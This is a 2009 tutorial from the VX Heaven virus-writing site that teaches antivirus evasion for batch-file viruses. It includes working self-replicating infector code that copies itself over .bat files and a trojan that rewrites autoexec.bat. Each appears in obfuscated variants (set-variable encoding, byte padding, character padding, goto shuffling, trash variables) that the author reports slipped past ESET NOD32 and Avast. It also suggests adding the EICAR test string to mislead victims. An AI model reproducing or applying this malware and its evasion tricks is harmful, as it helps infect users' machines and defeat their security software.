Maximize
Bookmark

VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Anti AV Techniques For Batch

cOrRuPt G3n3t!x
July 2009

[Back to index] [Comments]

In order to make our batch file virus a little more inconspicuos, unreadable or undetectable we use batch encryption techniques to fool AV's and people trying read or decypher our code. There are many different ways and today i'll explain all the possible ways i know for batch encryption and AV & AV heuristics fooling. I used ESET NOD32 Anti-Virus for its great herustics capabilities and Avast4 Professional Edition for normal detection. Please remember all techniques have been tested on Windows Vista and work!

1)EICAR Test File:

AV companies needed a way to test whether their product works on the users computer but without bringing harm to it, so EICAR was born, a universal string of code that will set off all AV's but will display 'EICAR TEST FILE NOT A VIRUS' or something similar, so we therefore, add this string to the begining of our code in hopes that the user will let it run after seeing that its a test file and not a virus. This will help when infecting people with limited knowlegde on viruses so definitely not a great technique when compared to others but non the less, here's the string for the EICAR 'Virus' which should be added to the beginning of your code:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

2)Fake Bytes:

All AV's will only scan the first 1000 bytes of a batch file for any malicious code, so what do we do? We add a whole bunch of letters in the first 1000 bytes of our code, pretty easy and an excellent way to bypass scanners and in some cases AV heurstics. So here is exactly a 1000 bytes of useless code which should be pasted at the beginning of your code:

jfnvjdfvbdfrjcedjcndskcjlewkjdelkasusywkiqwndsjhcgbdkisknckichcdsjyefgwiednnauxxbjnkaskjgbuhyhdgddr
djdchcvnfdhvjknvjknvfbdfhvbdfjncfdnfhvjrhskjfnmaskldnchfvbgfvffscdjfbnjehcfnjhcbjhnvdjuknvchdhbhvhf
fdgvcdfgcvjhvbnfvfdhbfvdjnfvdnbjfvnjgbnjkfvsjlsfdjhfsndsajkfdsvefeyufguyshduygfbdbcyufreubfuyhfdbk
fndsfungcuhfjhcvnhsfdncjsjzlixldjfouyfhfrufmrnjhggvcnnfvdeyhfyfghnfguhfuyndfhfdrsognfdhjfdyfdhfdhg
fhvbdh7rhuigfuhgudjfdujguighsudgduhgjugsifdkgiojfdhiudfgmnjhdgufhuigfjguijgukhgkjgufdhgjfugfchghjh
hsbdfjdrbfjdbgvfovngkllksfjbnmgkjvnvjkgfnkbfgvhnfgijgfjknfghjgffghdunvuhnuihgfgjifugjiuhdruiryhgui
dsbdyhceyifgbycgnjhfhjhvfbdgjhnhjhsdhbgsftrhgbvsrulsfkewajfreihnrnusrnvcuhiurgfeuygfruyfgybfdbkjkd
dscgfbdofnjkfhnkjfnkovmhuihgudljcugrhnuhvgvnuivgfhgdfigjngnklvtghnmgiojgfnkjgfhnfhngfvjnkfgvlkgfng
fdkbsdcfhnmvghnfvkjfjkgfpkogjroisjoersmcetkuntbggkhgjhdlewrlkjrhjiurnvuinvynbtrhurenyviuntruirtunv
dsuifhuyafgbycfgruyfgnucafipjnfnjkhnfidhfvmdkhzkdlhfnuygjkdngtfrjhnguhyghsduvbgrjkhvsriulkghnkjhgu

3)Standard Encryption Technique (SET):

As the acronym would suggest this is a technique whereby the 'set' command in MS-DOS is used to encrypt the batch file and make it hard for the AV to analyze and for the user to interpret. we do this by assigning a variable to a set command, this might not make sense but see below:

This was detected as 'BAT/Silly.D Virus' by ESET NOD32:

for %%a in (*.bat) do copy %0 %%a

Now by encrypting vairbles: for, in, do and copy it will become undetected. Although it was not detected by encrypting only one of the variables this will not always be the case. This was not detected by ESET NOD32 or Avast4:

set a=for
set b=in
set c=do
set d=copy
%a% %%a %b% (*.bat) %c% %d% %0 %%a

This will be compilcated for others to read but not for people with a knowledge of batch so what you could do is make the set encryption appear at the bottom of your code and then begin to read the top, this will work well with large code as the user will have to scroll down to see the set encryption. You can do this simply by having a 'GOTO' command that will goto the decryption parameter before returning to the encrypted code, using more then one variable will make it much harder to read! See below:

@echo off
GOTO decrypt
:infect
%a% %%a %b% (*.bat) %c% %d% %0 %%a
%a% %%a %b% (C:\*.bat) %c% %d% %0 %%a
%a% %%a %b% (C:\Windows*.bat) %c% %d% %0 %%a
exit
:decrypt
set a=for
set b=in
set c=do
set d=copy
goto infect

4)Character Overflow:

Fisrt off thanks to DvL for this idea and now lets begin. This is just an awesome name i gave to a Anti AV technique that will help by hiding your lines and fool the AV from detecting the right tokens in your batch. All you need to do is add characters betwee each line of your code, it can also be numbers I used the character 'n' as it was used in the legendary SASSER worm to cause a buffer overrun. The only snag is the virus has to have more then 3 or 4 lines to work effectively.

This is a virus by Ratty which was detected as 'BAT/Ratty.Substcde.A Trojan' by ESET NOD32

@echo off
ctty nul
@echo subst e: a:\ > c:\autoexec.bat
@echo subst d: a:\ >> c:\autoexec.bat
@echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls

When using the Character Overflow technique it was not detected by ESET NOD32:

nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo off
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
ctty nul
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo subst e: a:\ > c:\autoexec.bat
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo subst d: a:\ >> c:\autoexec.bat
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
@echo subst c: a:\ >> c:\autoexec.bat
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
ctty con
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
cls
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn

5) GOTO Confuser:

This is a bit impractical as it takes extremely long and is pretty confusing depending on the size of your code. It only works with code that is longer then 5 lines. What it does is confuse the AV by giving multiple goto commands so the strings of the virus is seperate and not read as a single token so it wont be detected.

This is a virus by Ratty which was detected as 'BAT/Ratty.Substcde.A Trojan' by ESET NOD32:

@echo off
ctty nul
@echo subst e: a:\ > c:\autoexec.bat
@echo subst d: a:\ >> c:\autoexec.bat
@echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls

Using the GOTO confuser it was not detected by ESET NOD32:

@echo off
goto a
:f
ctty nul
goto b
:l
@echo subst e: a:\ > c:\autoexec.bat
goto c
:m
@echo subst d: a:\ >> c:\autoexec.bat
goto d
:r
@echo subst c: a:\ >> c:\autoexec.bat
ctty con
cls
:a
goto f
:b
goto l
:c
goto m
:d
goto r

6)Trash Code:

This refers to lines of code that simply do nothing, but as far as the AV is concerned its working code so wat do we do with this in mind? We put meaningless garbage between our actual code, it is however important to note that the lines you are using for trash code is not used for anything:

This was detected as 'BAT/Silly.D Virus' by ESET NOD32:

for %%a in (*.bat) do copy %0 %%a

When using garbage or trash code it was not detected:

set trash=
%trash% for %trash% %%a %trash% in %trash% (*.bat) %trash% do %trash% copy %trash% %0 %trash% %%a

In the first line we made sure trash was set to nothing then added the code to the virus it worked perfectly without being detected!

Thats all i have for now, i hope it helps, and be sure to look out for my next Tutorial on 'Polymorphism In Batch'. Remember this is for educational purposes only ;). If you'd like to contact me with any queries or problems please e-mail me at immortalassassin@rocketmail.com.

By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! vxheaven.org aka vx.netlux.org
deenesitfrplruua